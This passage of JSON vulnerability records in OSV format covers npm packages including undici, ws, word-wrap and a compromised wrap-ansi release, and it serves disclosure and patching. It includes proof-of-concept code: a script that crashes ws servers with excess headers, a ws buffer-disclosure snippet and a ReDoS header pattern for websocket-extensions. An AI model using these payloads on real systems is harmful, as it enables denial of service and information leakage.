"ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.28.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-m4v8-wqvr-p9f7/GHSA-m4v8-wqvr-p9f7.json" } }, { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.11.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-m4v8-wqvr-p9f7/GHSA-m4v8-wqvr-p9f7.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30260" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75" }, { "type": "WEB", "url": "https://hackerone.com/reports/2408074" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240905-0008" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-285", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2024-04-04T14:20:39Z", "nvd_published_at": "2024-04-04T16:15:08Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pgw7-wx7w-2w33", "published": "2022-06-17T01:02:29Z", "modified": "2023-11-08T04:09:35.326222Z", "aliases": [ "CVE-2022-32210" ], "related": [ "CVE-2022-32210" ], "summary": "ProxyAgent vulnerable to MITM", "details": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request \u0026 response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`** with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.8.2" }, { "fixed": "5.5.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 5.5.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-pgw7-wx7w-2w33/GHSA-pgw7-wx7w-2w33.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32210" }, { "type": "WEB", "url": "https://hackerone.com/reports/1583680" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2022-06-17T01:02:29Z", "nvd_published_at": "2022-07-14T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q768-x9m6-m9qp", "published": "2022-07-21T20:31:05Z", "modified": "2024-12-05T15:41:55.533076Z", "aliases": [ "CVE-2022-31151" ], "related": [ "CVE-2023-45143" ], "summary": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect", "details": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). \n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-q768-x9m6-m9qp/GHSA-q768-x9m6-m9qp.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31151" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/issues/872" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/pull/1441" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d" }, { "type": "WEB", "url": "https://hackerone.com/reports/1635514" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.8.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220909-0006" } ], "database_specific": { "cwe_ids": [ "CWE-346", "CWE-601", "CWE-93" ], "github_reviewed": true, "github_reviewed_at": "2022-07-21T20:31:05Z", "nvd_published_at": "2022-07-21T04:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r6ch-mqf9-qc9w", "published": "2023-02-16T20:46:10Z", "modified": "2023-11-08T04:11:48.635999Z", "aliases": [ "CVE-2023-24807" ], "related": [ "CVE-2023-24807" ], "summary": "Regular Expression Denial of Service in Headers", "details": "### Impact\nThe `Headers.set()` and `Headers.append()` methods are vulnerable to Regular Expression Denial of Service (ReDoS) attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normalize the values in the `headerValueNormalize()` utility function.\n\n### Patches\n\nThis vulnerability was patched in v5.19.1.\n\n### Workarounds\nThere is no workaround. Please update to an unaffected version.\n\n### References\n\n* https://hackerone.com/bugs?report_id=1784449\n\n### Credits\n\nCarter Snook reported this vulnerability.\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.19.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-r6ch-mqf9-qc9w/GHSA-r6ch-mqf9-qc9w.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-r6ch-mqf9-qc9w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24807" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/f2324e549943f0b0937b09fb1c0c16cc7c93abdf" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.19.1" }, { "type": "WEB", "url": "https://hackerone.com/bugs?report_id=1784449" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-02-16T20:46:10Z", "nvd_published_at": "2023-02-16T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wqq4-5wpv-mx2g", "published": "2023-10-16T14:05:37Z", "modified": "2024-12-05T15:42:14.323907Z", "aliases": [ "CVE-2023-45143" ], "related": [ "CVE-2023-45143" ], "summary": "Undici's cookie header not cleared on cross-origin redirect in fetch", "details": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n", "affected": [ { "package": { "name": "undici", "ecosystem": "npm", "purl": "pkg:npm/undici" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.26.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-wqq4-5wpv-mx2g/GHSA-wqq4-5wpv-mx2g.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45143" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76" }, { "type": "WEB", "url": "https://hackerone.com/reports/2166948" }, { "type": "PACKAGE", "url": "https://github.com/nodejs/undici" }, { "type": "WEB", "url": "https://github.com/nodejs/undici/releases/tag/v5.26.2" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2023-10-16T14:05:37Z", "nvd_published_at": "2023-10-12T17:15:10Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-333w-rxj3-f55r", "published": "2018-07-24T20:00:30Z", "modified": "2024-04-22T19:37:18Z", "aliases": [ "CVE-2017-16021" ], "summary": "Regular Expression Denial Of Service in uri-js", "details": "Affected versions of `uri-js` is susceptible to a regular expression denial of service vulnerability when user input is sent to the `.parse()` method.\n\n\n\n## Recommendation\n\nUpdate to v3.0.0 or later.", "affected": [ { "package": { "name": "uri-js", "ecosystem": "npm", "purl": "pkg:npm/uri-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-333w-rxj3-f55r/GHSA-333w-rxj3-f55r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16021" }, { "type": "WEB", "url": "https://github.com/garycourt/uri-js/issues/12" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-333w-rxj3-f55r" }, { "type": "WEB", "url": "https://nodesecurity.io/advisories/100" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/100" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:53:45Z", "nvd_published_at": "2018-06-04T19:29:01Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g78m-2chm-r7qv", "published": "2020-06-05T16:16:12Z", "modified": "2025-01-14T08:57:32.136279Z", "aliases": [ "CVE-2020-7662" ], "related": [ "CVE-2020-7662" ], "summary": "Regular Expression Denial of Service in websocket-extensions (NPM package)", "details": "### Impact\n\nThe ReDoS flaw allows an attacker to exhaust the server's capacity to process\nincoming requests by sending a WebSocket handshake request containing a header\nof the following form:\n\n Sec-WebSocket-Extensions: a; b=\"\\c\\c\\c\\c\\c\\c\\c\\c\\c\\c ...\n\nThat is, a header containing an unclosed string parameter value whose content is\na repeating two-byte sequence of a backslash and some other character. The\nparser takes exponential time to reject this header as invalid, and this will\nblock the processing of any other work on the same thread. Thus if you are\nrunning a single-threaded server, such a request can render your service\ncompletely unavailable.\n\n### Patches\n\nUsers should upgrade to version 0.1.4.\n\n### Workarounds\n\nThere are no known work-arounds other than disabling any public-facing\nWebSocket functionality you are operating.\n\n### References\n\n- https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions/", "affected": [ { "package": { "name": "websocket-extensions", "ecosystem": "npm", "purl": "pkg:npm/websocket-extensions" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.1.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-g78m-2chm-r7qv/GHSA-g78m-2chm-r7qv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/faye/websocket-extensions-node/security/advisories/GHSA-g78m-2chm-r7qv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7662" }, { "type": "WEB", "url": "https://github.com/faye/websocket-extensions-node/commit/29496f6838bfadfe5a2f85dff33ed0ba33873237" }, { "type": "WEB", "url": "https://blog.jcoglan.com/2020/06/02/redos-vulnerability-in-websocket-extensions" }, { "type": "PACKAGE", "url": "https://github.com/faye/websocket-extensions-node" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-WEBSOCKETEXTENSIONS-570623" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-03T23:10:26Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j8xg-fqg3-53r7", "published": "2023-06-22T06:30:18Z", "modified": "2025-02-13T19:00:43Z", "aliases": [ "CVE-2023-26115" ], "summary": "word-wrap vulnerable to Regular Expression Denial of Service", "details": "All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.", "affected": [ { "package": { "name": "word-wrap", "ecosystem": "npm", "purl": "pkg:npm/word-wrap" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-j8xg-fqg3-53r7/GHSA-j8xg-fqg3-53r7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26115" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/commit/420dce9a2412b21881202b73a3c34f0edc53cb2e" }, { "type": "PACKAGE", "url": "https://github.com/jonschlinkert/word-wrap" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/blob/master/index.js#L39" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/blob/master/index.js%23L39" }, { "type": "WEB", "url": "https://github.com/jonschlinkert/word-wrap/releases/tag/1.2.4" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-4058657" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-WORDWRAP-3149973" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-06-23T21:36:40Z", "nvd_published_at": "2023-06-22T05:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46983", "published": "2025-09-08T17:19:41Z", "modified": "2025-09-12T01:13:35Z", "aliases": [ "GHSA-2rv4-jp6r-xgq7" ], "summary": "Malicious code in wrap-ansi (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (9e58bb76dd73218635e5f6badd1c9693b827a8eb1be48d0bac75d6f8f85d4b53)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "wrap-ansi", "ecosystem": "npm", "purl": "pkg:npm/wrap-ansi" }, "versions": [ "9.0.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/wrap-ansi/MAL-2025-46983.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2rv4-jp6r-xgq7" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-09T00:35:48.401637602Z", "modified_time": "2025-09-08T18:21:37Z", "sha256": "9e58bb76dd73218635e5f6badd1c9693b827a8eb1be48d0bac75d6f8f85d4b53", "source": "ghsa-malware", "versions": [ "9.0.1" ] }, { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-10T00:34:05.195235017Z", "modified_time": "2025-09-08T18:21:37Z", "sha256": "4c4bf3872e7828d6ef2152082e1c866e9eacc2f48bbbc739900e1606bed129bb", "source": "ghsa-malware", "versions": [ "9.0.1" ] }, { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-11T00:34:35.442370858Z", "modified_time": "2025-09-10T17:56:24Z", "sha256": "4f48e2f6fc3cfff774a2698e39d7f9079bec18cdd5e1e8221e767925e889497b", "source": "ghsa-malware", "versions": [ "9.0.1" ] }, { "id": "GHSA-2rv4-jp6r-xgq7", "import_time": "2025-09-12T00:33:58.008935793Z", "modified_time": "2025-09-10T17:56:24Z", "sha256": "c05f3bc963e30ddf435d8a80250a8ace01d29fbfbf87ec2fe7d1d50e41d25f2b", "source": "ghsa-malware", "versions": [ "9.0.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2mhh-w6q8-5hxw", "published": "2019-02-18T23:56:42Z", "modified": "2023-11-08T03:58:10.113790Z", "aliases": [ "CVE-2016-10518" ], "summary": "Remote Memory Disclosure in ws", "details": "Versions of `ws` prior to 1.0.1 are affected by a remote memory disclosure vulnerability.\n\nIn certain rare circumstances, applications which allow users to control the arguments of a `client.ping()` call will cause `ws` to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.\n\n\n\n## Proof of Concept\n```\nvar ws = require('ws')\n\nvar server = new ws.Server({ port: 9000 })\nvar client = new ws('ws://localhost:9000')\n\nclient.on('open', function () {\n console.log('open')\n client.ping(50) // this sends a non-zeroed buffer of 50 bytes\n\n client.on('pong', function (data) {\n console.log('got pong')\n console.log(data) // Data from the client. \n })\n})\n```\n\n\n## Recommendation\n\nUpdate to version 1.0.1 or greater.", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-2mhh-w6q8-5hxw/GHSA-2mhh-w6q8-5hxw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10518" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/29293ed11b679e0366fa0f6bb9310b330dafd795" }, { "type": "WEB", "url": "https://gist.github.com/c0nrad/e92005446c480707a74a" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2mhh-w6q8-5hxw" }, { "type": "WEB", "url": "https://github.com/websockets/ws/releases/tag/1.0.1" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/67" } ], "database_specific": { "cwe_ids": [ "CWE-201" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:52:34Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-3h5v-q93c-6h6q", "published": "2024-06-17T19:09:10Z", "modified": "2024-07-15T22:12:28.401556Z", "aliases": [ "CVE-2024-37890" ], "related": [ "CGA-4mjj-vhp5-59v2", "CGA-5jj7-2gq6-8p9g", "CGA-6rmc-53qg-r2v4", "CGA-cm39-xg6p-r3wr", "CGA-h8rj-78mh-45v7", "CGA-hf88-h9xp-mq5f", "CGA-qv4g-5p29-rxvx", "CGA-r6qh-9mxv-rrj2", "CVE-2024-37890" ], "summary": "ws affected by a DoS when handling a request with many HTTP headers", "details": "### Impact\n\nA request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server.\n\n### Proof of concept\n\n```js\nconst http = require('http');\nconst WebSocket = require('ws');\n\nconst wss = new WebSocket.Server({ port: 0 }, function () {\n const chars = \"!#$%\u0026'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~\".split('');\n const headers = {};\n let count = 0;\n\n for (let i = 0; i \u003c chars.length; i++) {\n if (count === 2000) break;\n\n for (let j = 0; j \u003c chars.length; j++) {\n const key = chars[i] + chars[j];\n headers[key] = 'x';\n\n if (++count === 2000) break;\n }\n }\n\n headers.Connection = 'Upgrade';\n headers.Upgrade = 'websocket';\n headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\n headers['Sec-WebSocket-Version'] = '13';\n\n const request = http.request({\n headers: headers,\n host: '127.0.0.1',\n port: wss.address().port\n });\n\n request.end();\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)\n\n### Workarounds\n\nIn vulnerable versions of ws, the issue can be mitigated in the following ways:\n\n1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent.\n2. Set `server.maxHeadersCount` to `0` so that no limit is applied.\n\n### Credits\n\nThe vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in https://github.com/websockets/ws/issues/2230.\n\n### References\n\n- https://github.com/websockets/ws/issues/2230\n- https://github.com/websockets/ws/pull/2231\n\n[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize\n[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener\n[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount\n", "affected": [ { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.1.0" }, { "fixed": "5.2.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.2.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.5.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } }, { "package": { "name": "ws", "ecosystem": "npm", "purl": "pkg:npm/ws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.17.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-3h5v-q93c-6h6q/GHSA-3h5v-q93c-6h6q.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q" }, { "type": "WEB", "url": "https://github.com/websockets/ws/issues/2230" }, { "type": "WEB", "url": "https://github.com/websockets/ws/pull/2231" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c" }, { "type": "WEB", "url": "https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63" }, { "type": "PACKAGE", "url": "https://github.com/websockets/ws" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "github_reviewed_at": "2024-06-17T19:09:10Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5v72-xg48-5rpm", "published": "2019-06-04T19:37:52Z", "modified": "2021-08-04T21:29:05Z", "summary": "Denial of Service in ws", "details": "Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of concept\n\n```\nconst WebSocket = require('ws');\nconst net = 